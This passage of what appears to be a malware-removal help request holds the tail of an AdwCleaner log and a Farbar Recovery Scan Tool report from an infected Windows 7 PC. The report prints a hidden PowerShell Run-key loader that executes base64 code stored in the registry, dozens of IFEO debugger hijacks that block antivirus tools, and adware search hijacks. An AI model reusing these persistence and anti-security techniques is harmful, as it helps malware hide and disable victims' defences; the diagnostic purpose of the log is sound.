[-] Folder deleted: C:\Program Files\Common Files\freemake shared
[-] Folder deleted: C:\Users\violeta\AppData\Local\Geckofx


***** [ Files ] *****

[-] File deleted: C:\END
[-] File deleted: C:\Windows\system32\findit.xml
[-] File deleted: C:\Windows\system32\drivers\DrvAgent32.sys
[-] File deleted: C:\Users\violeta\AppData\Roaming\appdataFr2.bin
[-] File deleted: C:\Users\violeta\AppData\Roaming\Mozilla\Firefox\Profiles\pgyttybc._\searchplugins\findit.xml


***** [ DLL ] *****



***** [ WMI ] *****



***** [ Shortcuts ] *****



***** [ Scheduled Tasks ] *****



***** [ Registry ] *****

[-] Key deleted: HKCU\Software\eadc3112b5fd6bf3
[#] Key deleted on reboot: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\0A167702A96FE1D4DA3296FCA77354D9
[#] Key deleted on reboot: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\0A167702A96FE1D4DA3296FCA77354D9
[#] Key deleted on reboot: HKLM\SOFTWARE\Classes\Installer\Features\0A167702A96FE1D4DA3296FCA77354D9
[#] Key deleted on reboot: HKLM\SOFTWARE\Classes\Installer\Products\0A167702A96FE1D4DA3296FCA77354D9
[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\eSafeSvc
[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\SrvUpdater
[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\winzipersvc
[-] Key deleted: HKLM\SOFTWARE\Classes\qmgcfiles
[-] Key deleted: HKLM\SOFTWARE\Classes\QQAppIEAgentEx.AgentForAndroid
[-] Key deleted: HKLM\SOFTWARE\Classes\QQAppIEAgentEx.AgentForAndroid.1
[-] Key deleted: HKLM\SOFTWARE\Classes\Speed Analysis 2.Navbar
[-] Key deleted: HKLM\SOFTWARE\Classes\Speed Analysis 2.Navbar.1
[-] Key deleted: HKLM\SOFTWARE\Classes\Speed Analysis 2.ScriptHostObject
[-] Key deleted: HKLM\SOFTWARE\Classes\Speed Analysis 2.ScriptHostObject.1
[-] Key deleted: HKLM\SOFTWARE\Classes\Speed Analysis 2.Tool
[-] Key deleted: HKLM\SOFTWARE\Classes\Speed Analysis 2.Tool.1
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{7A30415C-ABEE-4674-B64B-4CA145EEB0CA}
[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{6E1533F0-E0B5-465A-9F16-98FF0C76D493}
[-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{8519F1E4-E25B-42B1-B361-0C643F45CF11}
[-] Key deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{50F4150A-48B2-417A-BE4C-C83F580FB904}
[-] Key deleted: HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Software\Conduit
[-] Key deleted: HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Software\INSTALLPATH\STATUS
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-3268508096-794200350-1188608446-1000\Software\Speed Analysis 2
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-3268508096-794200350-1188608446-1000\Software\SweetIM
[-] Key deleted: HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\1ClickMovie-Download V9.0
[#] Key deleted on reboot: HKCU\Software\Conduit
[#] Key deleted on reboot: HKCU\Software\INSTALLPATH\STATUS
[-] Key deleted: HKLM\SOFTWARE\mtAirtostrong
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Plants Vs Zombies
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Stpro.exe
[-] Value deleted: HKCU\Environment [SNF]
[-] Value deleted: HKCU\Environment [SNP]
[-] Key deleted: HKLM\SOFTWARE\Classes\AppID\QMContextScan.DLL
[-] Key deleted: HKLM\SOFTWARE\MozillaPlugins\@qq.com/npandroidassistant
[-] Key deleted: HKCU\Software\Classes\VirtualStore\MACHINE\SOFTWARE\Tencent
[-] Key deleted: HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\AIRTOSTRONG.EXE
[#] Key deleted on reboot: HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\APP PATHS\Stpro.exe
[-] Key deleted: HKEY_CLASSES_ROOT\.qmgc
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\Airtostrong.exe


***** [ Web browsers ] *****



*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C2].txt - [5257 Bytes] - [14/10/2016 22:04:06]
C:\AdwCleaner\AdwCleaner[C6].txt - [9873 Bytes] - [14/11/2015 17:22:31]
C:\AdwCleaner\AdwCleaner[R1].txt - [20631 Bytes] - [18/06/2015 15:02:17]
C:\AdwCleaner\AdwCleaner[R2].txt - [2882 Bytes] - [06/07/2015 1931]
C:\AdwCleaner\AdwCleaner[R3].txt - [13159 Bytes] - [17/07/2015 10:20:58]
C:\AdwCleaner\AdwCleaner[R4].txt - [3362 Bytes] - [12/08/2015 17:14:16]
C:\AdwCleaner\AdwCleaner[S1].txt - [18788 Bytes] - [18/06/2015 15:10:33]
C:\AdwCleaner\AdwCleaner[S2].txt - [2689 Bytes] - [06/07/2015 19:09:55]
C:\AdwCleaner\AdwCleaner[S3].txt - [12409 Bytes] - [17/07/2015 10:23:35]
C:\AdwCleaner\AdwCleaner[S4].txt - [3067 Bytes] - [12/08/2015 17:17:39]
C:\AdwCleaner\AdwCleaner[S6].txt - [9199 Bytes] - [14/11/2015 17:18:34]
C:\AdwCleaner\AdwCleaner[S7].txt - [494 Bytes] - [14/11/2015 17:32:19]
C:\AdwCleaner\AdwCleaner[S8].txt - [5977 Bytes] - [14/10/2016 21:58:51]

########## EOF - C:\AdwCleaner\AdwCleaner[C2].txt - [6209 Bytes] ##########









the Frst.txt file:
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 13-10-2016
Ran by violeta (administrator) on NIKOLA-PC (14-10-2016 22:30:46)
Running from C:\Users\violeta\Desktop
Loaded Profiles: violeta (Available Profiles: violeta)
Platform: Microsoft Windows 7 Professional Service Pack 1 (X86) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: https://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Hi-Rez Studios) C:\Program Files\Hi-Rez Studios\HiPatchService.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe
(LogMeIn, Inc.) C:\Program Files\LogMeIn Hamachi\LMIGuardianSvc.exe
() C:\Windows\System32\PnkBstrA.exe
() C:\Program Files\Razer\Razer Services\GSS\GameScannerService.exe
(Razer Inc.) C:\Program Files\Razer\Razer Cortex\RzKLService.exe
(www.shadowexplorer.com) C:\Program Files\ShadowExplorer\sesvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Rocket Division Software) C:\Program Files\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\TeamViewer_Service.exe
() C:\ProgramData\Telenor Internet\OnlineUpdate\ouc.exe
() C:\Program Files\TunnelBear\TBear.Maintenance.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(LogMeIn Inc.) C:\Program Files\LogMeIn Hamachi\hamachi-2.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\System32\wuauclt.exe
(Microsoft Corporation.) C:\Program Files\Microsoft\BingBar\7.1.362.0\SeaPort.EXE


==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [595992 2016-05-20] (Oracle Corporation)
HKLM\...\Run: [LogMeIn Hamachi Ui] => C:\Program Files\LogMeIn Hamachi\hamachi-2-ui.exe [5565960 2016-09-13] (LogMeIn Inc.)
HKLM\...\Run: [Lightshot] => C:\Program Files\Skillbrains\lightshot\Lightshot.exe [225944 2016-07-11] ()
HKLM\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\Run: [AlcoholAutomount] => C:\Program Files\Alcohol Soft\Alcohol 120\axcmd.exe [203928 2009-04-24] (Alcohol Soft Development Team)
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\Run: [{57E0064B-6CDF-4014-A8FF-F401291F5488}] => powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\NYQUMMEV').KgJaKWdyhxnot)));
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\CurrentVersion\Windows: [Load] C:\Windows\system32\Microsoft.com <===== ATTENTION
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: E - E:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: H - H:\setup.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {77b5a5be-29d4-11e1-ac3d-806e6f6e6963} - D:\setup\rsrc\Autorun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {c0d6b2af-2ab0-11e1-8970-6c626daeeb0d} - E:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {c5841f0c-20e0-11e6-8237-6c626daeeb0d} - I:\INSTALL_ADB_RNDIS.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {cd9f060b-2c6a-11e1-a88a-6c626daeeb0d} - E:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {ed1d0150-29d4-11e1-b1db-6c626daeeb0d} - E:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {ed1d0177-29d4-11e1-b1db-6c626daeeb0d} - E:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {f4c05fa2-2a39-11e1-90e7-6c626daeeb0d} - F:\AutoRun.exe
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\...\MountPoints2: {f4c05fad-2a39-11e1-90e7-6c626daeeb0d} - F:\AutoRun.exe
HKU\S-1-5-18\...\RunOnce: [SPReview] => C:\Windows\System32\SPReview\SPReview.exe [280576 2013-04-30] (Microsoft Corporation)
HKU\S-1-5-18\...\RunOnce: [SpUninstallDeleteDir] => rmdir /s /q "\SearchProtect"
HKU\S-1-5-18\...\Policies\Explorer: [HideSCAHealth] 1
IFEO\AvastSvc.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\AvastUI.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avcenter.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avconfig.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgcsrvx.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgidsagent.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgnt.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgrsx.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avguard.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgui.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avgwdsvc.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avp.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\avscan.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\bdagent.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\ccuac.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\ComboFix.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\coreFrameworkHost.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\coreServiceShell.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\egui.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\hijackthis.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\instup.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\keyscrambler.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\mbam.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\mbamgui.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\mbampt.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\mbamscheduler.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\mbamservice.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\MpCmdRun.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\MSASCui.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\MsMpEng.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\msseces.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\rstrui.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\spybotsd.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\SSScheduler.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\TuneUpUtilitiesApp32.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\TuneUpUtilitiesService32.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\uiSeAgnt.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\uiWatchDog.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\wireshark.exe: [Debugger] C:\Windows\system32\Microsoft.com
IFEO\zlclient.exe: [Debugger] C:\Windows\system32\Microsoft.com
ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => No File
ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => No File
ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => No File
Startup: C:\Users\violeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Registration RAYMAN [2015-03-20] ()
BootExecute: autocheck autochk * Partizan
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Winsock: Catalog5 09 C:\Program Files\Bonjour\mdnsNSP.dll [147456 2008-12-12] (Apple Inc.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\..\Interfaces\{5A19095F-7933-4DA1-AD09-19E979DC22C7}: [NameServer] 217.65.192.101 217.65.192.102
Tcpip\..\Interfaces\{79289764-7478-4021-A6D0-8EAF6EFDDD53}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{79976A8E-F478-4642-88DD-27DD71B01DC2}: [DhcpNameServer] 172.18.12.1
Tcpip\..\Interfaces\{9F6CCFF6-FC61-4F75-BD9A-39A7BE019C6E}: [NameServer] 217.65.192.101 217.65.192.102
Tcpip\..\Interfaces\{C2E0376F-F85D-46E3-80E2-201AFBF0F518}: [NameServer] 217.65.192.101 217.65.192.102

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/p/?LinkId=619797&pc=UE07&ocid=UE07DHP
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-3268508096-794200350-1188608446-1000\Software\Microsoft\Internet Explorer\Main,SearchAssistant = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBUTxkij9_B3McXDvdSN6JAXeQNqF9tomnI4v_-Q-v4mvx2kMn7Bh-Xf-EJYEejn7YWcl-PlhbuddCMlP0mwyMzARSqo7-Wmu3hY49Niunccg3DmrDXz5ysmP3WX7Aete0Eac57BLcvq82zb4dfcwWjZDbkUtDIRutjgO4XjIKICjIB-c42AaU,&q={searchTerms}
URLSearchHook: [S-1-5-21-3268508096-794200350-1188608446-1000] ATTENTION => Default URLSearchHook is missing
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\.DEFAULT -> {0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll [2009-02-26] (Microsoft Corporation)
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-05-25] (Microsoft Corporation)
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll [2016-02-01] (Skype Technologies)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-05-25] (Microsoft Corporation)
Handler: tmbp - {1A77E7DC-C9A0-4110-8A37-2F36BAE71ECF} - C:\Program Files\Trend Micro\AMSP\Module\20002\6.6.1010\6.6.1010\TmBpIe32.dll [2011-03-25] (Trend Micro Inc.)
Handler: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - C:\Program Files\Trend Micro\AMSP\Module\20004\1.5.1504\6.6.1088\TmIEPlg.dll [2010-07-20] (Trend Micro Inc.)

FireFox:
========
FF DefaultProfile: pgyttybc._
FF ProfilePath: C:\Users\violeta\AppData\Roaming\Mozilla\Firefox\Profiles\pgyttybc._ [2016-10-14]
FF Extension: (Skype Click to Call) - C:\Program Files\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A} [2016-09-24] [not signed]
FF Extension: (Skype) - C:\Program Files\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2016-05-25]
FF HKLM\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext => not found
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Users\violeta\AppData\Roaming\okitspace\Firefox => not found
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\WebexpEnhancedV1\WebexpEnhancedV1alpha842\ff => not found
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\VideoPlayerV3\VideoPlayerV3beta322\ff => not found
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_23_0_0_162.dll [2016-09-14] ()
FF Plugin: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw_1213153.dll [2014-06-24] (Adobe Systems, Inc.)
FF Plugin: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [2012-07-31] (Foxit Corporation)
FF Plugin: @Google.com/GoogleEarthPlugin -> C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll [2015-05-21] (Google)
FF Plugin: @java.com/DTPlugin,version=11.91.2 -> C:\Program Files\Java\jre1.8.0_91\bin\dtplugin\npDeployJava1.dll [2016-07-11] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.91.2 -> C:\Program Files\Java\jre1.8.0_91\bin\plugin2\npjp2.dll [2016-07-11] (Oracle Corporation)
FF Plugin: @live.heroesandgenerals.com/npretox -> C:\Program Files\Heroes & Generals\live\npretox-1.0.6.1\npretoxlive-1.0.6.1.dll [2015-05-05] (Reto-Moto ApS)
FF Plugin: @mcafee.com/McAfeeMssPlugin -> C:\Program Files\McAfee Security Scan\3.8.141\npMcAfeeMss.dll [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50901.0\npctrl.dll [2016-08-31] ( Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=16.4.3503.0728 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll [2012-07-28] (Microsoft Corporation)
FF Plugin: @nexon.net/NxGame -> C:\ProgramData\NexonUS\NGM\npNxGameUS.dll [2013-02-05] (Nexon)
FF Plugin: @pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
FF Plugin: @real.com/nppl3260;version=16.0.2.32 -> C:\Program Files\Real\RealPlayer\Netscape6\nppl3260.dll [No File]
FF Plugin: @real.com/nprpplugin;version=16.0.2.32 -> C:\Program Files\Real\RealPlayer\Netscape6\nprpplugin.dll [No File]
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin HKU\S-1-5-21-3268508096-794200350-1188608446-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\violeta\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2016-07-14] (Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-3268508096-794200350-1188608446-1000: pandonetworks.com/PandoWebPlugin -> C:\Program Files\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
FF Plugin HKU\S-1-5-21-3268508096-794200350-1188608446-1000: thehappycloud.com/HappyCloudPlugin -> C:\ProgramData\HappyCloud\Application\npHappyCloudPlugin.dll [2013-11-17] (The Happy Cloud)
FF Plugin HKU\S-1-5-21-3268508096-794200350-1188608446-1000: ubisoft.com/uplaypc -> C:\Program Files\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll [2016-09-06] ()
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppl3260.dll [2013-08-15] (RealNetworks, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nprpplugin.dll [2013-08-15] (RealPlayer)

Chrome:
=======
CHR DefaultProfile: Profile 1
CHR HomePage: Profile 1 -> hxxps://www.google.rs/
CHR StartupUrls: Profile 1 -> "hxxp://www.google.com/","hxxp://www.sweet-page.com/?type=hp&ts=1434546381&z=ebb035f865ef946d91753c5g9z0c1zcw1zeq9c6bbz&from=cor&uid=WDCXWD5000AVVS-63H0B1_WD-WCAUK094765147651","hxxps://www.google.rs/"
CHR DefaultSearchURL: Profile 1 -> hxxp://www.sweet-page.com/web/?type=ds&ts=1434546381&z=ebb035f865ef946d91753c5g9z0c1zcw1zeq9c6bbz&from=cor&uid=WDCXWD5000AVVS-63H0B1_WD-WCAUK094765147651&q={searchTerms}
CHR DefaultSearchKeyword: Profile 1 -> sweet-page
CHR Session Restore: Profile 1 -> is enabled.
CHR Profile: C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Profile 1 [2016-09-11]
CHR Extension: (Google диск) - C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-01]
CHR Extension: (YouTube) - C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-10-02]
CHR Extension: (Google Search) - C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-01]
CHR Extension: (Google документи офлајн) - C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-12-12]
CHR Extension: (Плаћања у Chrome веб-продавници) - C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-08-11]
CHR Extension: (Gmail) - C:\Users\violeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-06-18]
CHR HKU\S-1-5-21-3268508096-794200350-1188608446-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bhnddlaigdpagceekbpkajlgbnjbabig] - C:\Users\violeta\AppData\Local\CRE\bhnddlaigdpagceekbpkajlgbnjbabig.crx <not found>

Opera:
=======
OPR Extension: (Jungle Net) - C:\Users\violeta\AppData\Roaming\Opera Software\Opera Stable\Extensions\iffnkklnhcckdbakeemklgkangigdbbk [2015-06-17]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 c2cautoupdatesvc; C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1364096 2016-05-25] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1687680 2016-05-25] (Microsoft Corporation)
S3 c2wts; C:\Program Files\Windows Identity Foundation\v3.5\c2wtshost.exe [15768 2010-02-03] (Microsoft Corporation)
S3 EvoSvc; C:\Program Files\Echobit\Evolve\EvoSvc.exe [1583488 2015-08-18] (Echobit LLC)
S3 fussvc; C:\Program Files\Windows Kits\8.1\App Certification Kit\fussvc.exe [140800 2014-02-19] (Microsoft Corporation) [File not signed]
R2 Hamachi2Svc; C:\Program Files\LogMeIn Hamachi\hamachi-2.exe [1958408 2016-09-13] (LogMeIn Inc.)
U2 HiPatchService; C:\Program Files\Hi-Rez Studios\HiPatchService.exe [9728 2016-10-10] (Hi-Rez Studios) [File not signed]
S3 IDriverT; C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]
R2 IpOverUsbSvc; C:\Program Files\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe [22768 2014-04-17] (Microsoft Corporation)
R2 LMIGuardianSvc; C:\Program Files\LogMeIn Hamachi\LMIGuardianSvc.exe [405424 2016-08-31] (LogMeIn, Inc.)
S3 npggsvc; C:\Windows\system32\GameMon.des [5560840 2016-05-11] (INCA Internet Co., Ltd.)
S3 Origin Client Service; C:\Program Files\Origin\OriginClientService.exe [2142728 2016-10-11] (Electronic Arts)
S2 Origin Web Helper Service; C:\Program Files\Origin\OriginWebHelperService.exe [2209296 2016-10-11] (Electronic Arts)
S3 OverwolfUpdater; C:\Program Files\Overwolf\OverwolfUpdater.exe [1310448 2016-08-29] (Overwolf LTD)
R2 PnkBstrA; C:\Windows\system32\PnkBstrA.exe [76888 2012-11-03] ()
R2 Razer Game Scanner Service; C:\Program Files\Razer\Razer Services\GSS\GameScannerService.exe [188072 2015-08-15] ()
R2 RzKLService; C:\Program Files\Razer\Razer Cortex\RzKLService.exe [129168 2015-08-31] (Razer Inc.)
R2 sesvc; C:\Program Files\ShadowExplorer\sesvc.exe [9216 2013-01-02] (www.shadowexplorer.com) [File not signed]
S2 Skype C2C Service; C:\ProgramData\Skype\Toolbars\Skype C2C Service\c2c_service.exe [3048136 2012-05-30] () [File not signed]
R2 StarWindServiceAE; C:\Program Files\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe [275968 2007-05-28] (Rocket Division Software) [File not signed]
S3 Te.Service; C:\Program Files\Windows Kits\8.1\Testing\Runtimes\TAEF\Wex.Services.exe [91136 2013-08-21] (Microsoft Corporation) [File not signed]
